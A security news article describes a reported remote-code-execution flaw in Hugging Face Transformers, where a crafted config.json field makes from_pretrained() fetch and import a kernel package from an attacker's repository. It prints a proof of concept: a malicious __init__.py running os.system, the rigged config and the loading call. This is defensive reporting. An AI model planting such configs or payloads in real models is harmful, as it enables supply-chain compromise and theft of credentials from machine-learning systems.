Security Flaw Discovered in Hugging Face Transformers Poses Severe Risks to Machine Learning Pipelines
A significant security vulnerability has been identified in Hugging Face Transformers, assigned the identifier CVE-2026-4372. This flaw exposes countless machine learning workflows to the potential of silent remote code execution (RCE) through the use of malicious model configurations. The issue has raised alarms among security professionals and organizations that rely on the vast ecosystem of machine learning.
Discovery and Implications
The vulnerability was uncovered by Yotam Perkal, a researcher at Pluto Security, who detailed how the flaw allows attackers to execute arbitrary code on a victim’s machine. This is achieved through a deceptive mechanism where users are tricked into loading a compromised model using the standard from_pretrained() API. Notably, this exploitation can occur without the need for trust_remote_code=True or any direct user interaction, making it particularly insidious.
The flaw specifically affects transformer versions 4.56.0 through 5.2.x, particularly when used alongside the optional kernels package. The introduction of the vulnerable code path took place in August 2025, and it persisted as a risk for almost six months before being patched in version 5.3.0, released in March 2026. Given the extensive use of the Hugging Face library—boasting over 2.2 billion installations and approximately 146 million downloads monthly—this exposure represents a grave supply chain risk for AI pipelines, enterprise machine learning systems, and academic research environments.
Technical Underpinnings of the Vulnerability
At the core of this vulnerability lies the unsafe deserialization of untrusted configuration data. When a model is loaded, the library processes a config.json file, dynamically assigning all key-value pairs using Python’s setattr() function. Unfortunately, this process includes internal attributes that should not be user-controlled. For instance, the internal attribute _attn_implementation_internal specifies which attention kernel implementation to load. When manipulated by an attacker, this field can redirect to a malicious Hugging Face repository containing nefarious Python code.
The situation escalates when the interaction with the kernels package is considered. If the value of _attn_implementation_internal aligns with a repository pattern like "owner/repo," the library automatically downloads and imports the associated package. Alarmingly, this import occurs without any form of sandboxing, signature verification, or user notifications, effectively allowing a configuration field to become a mechanism for code execution.
Real-World Attack Scenarios
In practical attack scenarios, a malicious user can upload a harmful model with a specially crafted config.json file that includes the compromised field. When the victim executes a routine command, such as AutoModelForCausalLM.from_pretrained("attacker/model"), the library silently fetches and executes the attacker’s code during the model’s initialization phase. This occurs even if the user has explicitly disabled the trust_remote_code option, fundamentally undermining the security assumptions that developers and organizations depend on.
To illustrate the risk, consider a simplified proof of concept demonstrating how code execution can be triggered using a malicious kernel package:
# Malicious __init__.py hosted in attacker-controlled HF repo
import os
def exploit():
with open("/tmp/pwned.txt", "w") as f:
f.write("System compromised\n")
os.system("id > /tmp/user_info.txt")
exploit()The corresponding config.json could look like this:
{
"model_type": "llama",
"_attn_implementation_internal": "attacker/malicious-kernel",
"vocab_size": 32000
}When executed as follows:
from transformers import AutoModelForCausalLM
model = AutoModelForCausalLM.from_pretrained("attacker/malicious-model")The payload will execute automatically, leaving traces such as /tmp/pwned.txt on the victim’s system.
Risks of Data Compromise
Successful exploitation can enable attackers to steal sensitive data, including crucial AWS credentials, SSH keys, API tokens, and critical environment variables. Moreover, the attackers gain opportunities for persistence mechanisms, lateral movement within cloud infrastructure, and compromise CI/CD pipelines. The threat is especially pronounced in GPU-enabled settings and enterprise ML platforms where the kernel dependency is commonly installed.
Researchers specializing in security have drawn comparisons to previous vulnerabilities in the machine learning ecosystem. The issue echoes past flaws, such as those observed with PyTorch’s weights_only bypass (CVE-2025-32434), where "safe modes" failed to prevent unwanted code execution. This reflects a recurring design flaw in AI frameworks, where untrusted model artifacts are treated as benign data rather than executable inputs.
Resolution and Mitigation Strategies
The vulnerability has been addressed in version 5.3.0 of Transformers, which introduces a denylist to prevent unsafe internal attributes from being adjusted via configuration files. The patch also enforces the requirement of trust_remote_code=True for external kernel loading. Users are strongly encouraged to upgrade their libraries immediately and to refrain from loading untrusted models in sensitive environments.
In light of this incident, organizations are urged to treat all model-loading operations as potential surfaces for code execution. Policies should enforce sandboxing, restrict outbound network access, and isolate credentials from machine learning workloads. This incident serves as a stark reminder of the escalating risks associated with machine learning supply chains, which are increasingly becoming high-value targets for malicious actors.
For further information and updates, organizations and individuals can follow news outlets dedicated to cybersecurity and technology advancements.